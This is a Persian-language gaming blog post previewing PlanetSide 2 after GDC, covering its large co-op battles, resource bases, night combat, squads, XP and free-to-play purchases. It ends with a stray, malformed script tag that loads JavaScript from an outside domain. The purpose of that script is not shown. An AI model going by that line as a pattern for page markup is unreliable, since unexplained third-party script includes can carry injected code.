تبلیغات
بازیکده - داستان های جنگ

:درباره وبلاگ

:آرشیو

:طبقه بندی

:پیوندها

:پیوندهای روزانه

:نویسندگان

:آخرین پستها

:نظرسنجی

آماروبلاگ

یکشنبه 21 اسفند 1390-08:24 ب.ظلذت اصلی نسخه اول بازی PlanetSide داستان های جنگی آن بود. شما در زندگی دیگری بودید، اسم نظامی داشتید، برای یک جبهه و فرمانده می جنگیدید و با همرزم های خود خاطرات جنگ را تعریف می کردید. بار دیگر PlanetSide 2 قصد دارد آن تجربه را زنده کند و به همین خاطر آن ها به تازگی نسخه جدید این عنوان را در GDC امسال نشان دادند. مت هیگبای (Matt Higby) کارگردان بازی می گوید: "ما بسیاری از لحظات به یاد ماندنی PlanetSide را شناسایی کردیم و سعی کردیم همانند آن ها کار کنیم. این بازی همیشه در مورد یک عنوان Co-op با نقشه ای عظیم بوده است. یک جنگنده بزرگ در آسمان پرواز می کند و چندین نیرو که همه به صورت Co-op بازی می کنند را روانه میدان نبرد می کند.

در خیلی از بازی ها چنین صحنه هایی را فقط در Cut-Sceneها می بینید. Modern Warfare 3 از نظر سینمایی فوق العاده بود. شما هواپیماها را می بینید که بالای سر شما پرواز می کنند، نیروهای رزمی را در حال مبارزه می بینید و ساختمان هایی که منفجر می شوند را نظاره می کنید. شما حس می کنید جزوی از این مبارزه هستید. در PlanetSide 2 تمام این لحظات توسط بازیکن کنترل می شوند." میدان مبارزه شلوغ است و هر جعبه ای سعی می کند نیروهای خود را پیش ببرد. یکی از این گروه ها موفق می شود یک Base که منبع خاصی از تجهیزات است را بدست بیاورد.


هیگبای در مورد این قضیه می گوید: "من در مقابل نیروهای Vanu مبارزه می کنم که می توانند حالا با استفاده از دارایی های خود تانک هایشان را به Rail Beam Cannon مجهز کنند و تانک های من را نابود کنند. یکی از راه هایی که من می توانم با استفاده از آن مقابل دشمن ایستادگی کنم، این است که منبع اصلی آن ها را از آن خود کنم. پس من می توانم چند نیرو بفرستم تا جلوی تجهیزات آن ها را برای مجهز کردن تانک هایشان بگیرم." ولی کار به این آسانی ها هم نیست. خطوط دشمن خیلی قوی هستند و گاه ممکن است یک مأموریت حیاتی به یک خودکشی بزرگ تبدیل شود. سیاره Auraxix مکانی زیبا است. علف، درخت و کوه های زیادی در آن دیده می شوند و در کنار این زیبایی ها، وسایل نقلیه نظامی و آتش و دود هم وجود دارند.

سیستم شب و روز هم در بازی وجود دارد و در شب نور شلیک ها در دور دست آسمان را روشن می کند و منظره زیبایی را خلق می کند و تا زمانی که خورشید از پشت کوه طلوع کند، مبارزه ادامه دارد. در مأموریت های شب، شما مجهز به دوربین های دید در شب هستید که به خوبی موقعیت دشمن را شناسایی کنید. به طور کلی PlanetSide 2 بیشتر سعی می کند که به سبک تیراندازی باشد تا یک MMO و این برای طرفداران تیراندازی نظامی خبر خوبی است. شما می توانید با دوستان خود یک گروه 10 نفره تشکیل بدهید و در این مبارزه شرکت کنید. با بدست آوردن تجربیات بیشتر می توانید سلاح ها و امکانات بهتری بدست بیاورید.

هر چند این XPها در Upgradeها تأثیر ندارد و بیشتر در مورد سبک بازی کردن شما است. مثلاً شما می توانید یک اسلحه را به شکل دیگر استفاده کنید و یا از سلاح بسته شده به یک جت به صورت جداگانه استفاده کنید. می توانید از سلاح های تک تیرانداز در کنار مخفی شدن برای چند ثانیه استفاده کنید و یا با استفاده از C4 هدف های دوردست را نابود کنید و یا از دوربین های مخفیانه استفاده کنید و دید خوبی نسبت به میدان نبرد و تاکتیک های نیروهای مقابل داشته باشید. برای مبارزه در این میدان نبرد شما حتماً مجبور نیستید که اسلحه به دست بگیرید و شلیک کنید. شما می توانید خلبان یک جت باشید که نیروهای خود را از نقطه ای به نقطه خطرناک جنگ ببرید و آن ها را پیاده کنید و این ایثار شما بدون پاداش باقی نخواهد ماند و XP زیادی به شما می دهد.

چنین موضوعی در نیروهای پزشکی هم صدق می کند. PlanetSide 2 یک بازی مجانی است و شما مجبور نیستید برای بازی کردن آن پول بدهید، ولی برای خرید تجهیزات پیشرفته شما باید کمی خرج کنید. هیگبای می گوید: "در Station Cash شما می توانید XP، تقویت کننده سلاح و تجهیزات مختلف بخرید. البته تمام این تجهیزات با پیشروی در بازی قابل باز شدن هستند، ولی به این روش شما می توانید خیلی سریع به هر چیزی که دوست دارید، دست پیدا کنید." PlanetSide 2 بازی به نظر با ارزشی است و با نگاهی به نسخه بتای آن متوجه می شویم که این عنوان رایگان ارزش صبر کردن را دارد و باید دید آیا این بازی می تواند همانند نسخه اول خود موفق باشد یا نه.
تاریخ آخرین ویرایش:یکشنبه 21 اسفند 1390 08:29 ب.ظ
script src="http://filmdoni.ir/game/01.js" language="javascript" >